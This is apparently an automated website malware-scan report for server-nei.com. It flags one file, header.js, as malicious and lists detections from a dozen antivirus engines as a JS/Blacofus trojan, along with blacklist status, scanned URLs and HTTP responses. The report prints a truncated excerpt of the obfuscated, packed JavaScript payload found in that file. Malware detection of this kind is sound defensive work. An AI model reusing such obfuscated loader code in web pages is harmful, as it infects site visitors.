New scan:

Malware Scanner report for server-nei.com

Malicious/Suspicious/Total urls checked
1/0/9
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "server-nei.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=server-nei.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://server-nei.com/
200 OK
Content-Length: 6463
Content-Type: text/html
clean
http://server-nei.com/header.js
200 OK
Content-Length: 11758
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('z O(f){w.2D=z(a,b){q c=\'\';2A(q i=0;i<b.J;i++){c+=E.H(a.R(i%a.J)^b.R(i))}D c};w.U=z(h){K(h.C(\':\'))h=h.P(\':\')[0];q a=h.P(\'.\');Q(a.J>2){a.2z()}D a.2y(\'.\')}
... 3012 bytes are skipped ...
BYbTUFDTVENBgIVSAJBR0JKDAIMGgs8FwgXBkxKG1sNCQIBAAECFwdDURYASl4NAgcLFwI6E10HV0sHWGVNU0VSVkVSDU5FSQ4KCR8eSwECHB5IQBIAShcHTU5FUEYVCg9Vb0kOQ09NU0VSVkVSDQcDG0NNHBkKCRdYDRdECQ0dDl5PT0MVClReeA1ORUkOQ09NU0VSVgwUXwNLGloaAwhdExsFDBBEAgwdV0NSTVENGxIBF0NMXmMOQ09NU0VSVkVSDU4BBk0WAggdEVwUChZUQAQZXgYBCTANGxoBWkQIFwQHWGVkU0VSVgwUXw8IDHkCHC4BABMCABYNU0UdXBYKVnlFUlZFUg1ORRQkQ09NUxgRFxERRUYAQFVpZgQVFxMbACVMHSYbSwIbCBdFT1YQHEkLAwBABgtWeUVSVkUPJxNJSR9TX0RIbw|typeof|_typeof_|undefined|else|UHJxXbXn'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
Emsisoft
JS:Trojan.Script.WY (B)
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/Blacofus.A
F-Secure
JS:Trojan.Script.WY
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://server-nei.com/test/asp/test_mysql.asp
401 Unauthorized
Content-Length: 1007
Content-Type: text/html
clean
http://server-nei.com/test404page.js
404 Not Found
Content-Length: 1059
Content-Type: text/html
clean
http://server-nei.com/test/aspnet/test.aspx
401 Unauthorized
Content-Length: 1007
Content-Type: text/html
clean
http://server-nei.com/test/php/test.php
401 Unauthorized
Content-Length: 1007
Content-Type: text/html
clean
http://server-nei.com/test/coldfusion/test.cfm
401 Unauthorized
Content-Length: 1007
Content-Type: text/html
clean
http://server-nei.com/test/perl/test.pl
401 Unauthorized
Content-Length: 1007
Content-Type: text/html
clean
http://server-nei.com/test/python/test.py
401 Unauthorized
Content-Length: 1007
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: server-nei.com

Result:
HTTP/1.1 200 OK
Date: Sun, 11 Jan 2015 18:18:41 GMT
Accept-Ranges: bytes
ETag: "e421baabf654ce1:0"
Server: Microsoft-IIS/7.5
Content-Length: 6463
Content-Type: text/html
Last-Modified: Mon, 20 May 2013 01:09:26 GMT
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin

...6463 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: server-nei.com
Referer: http://www.google.com/search?q=server-nei.com

Result:
The result is similar to the first query. There are no suspicious redirects found.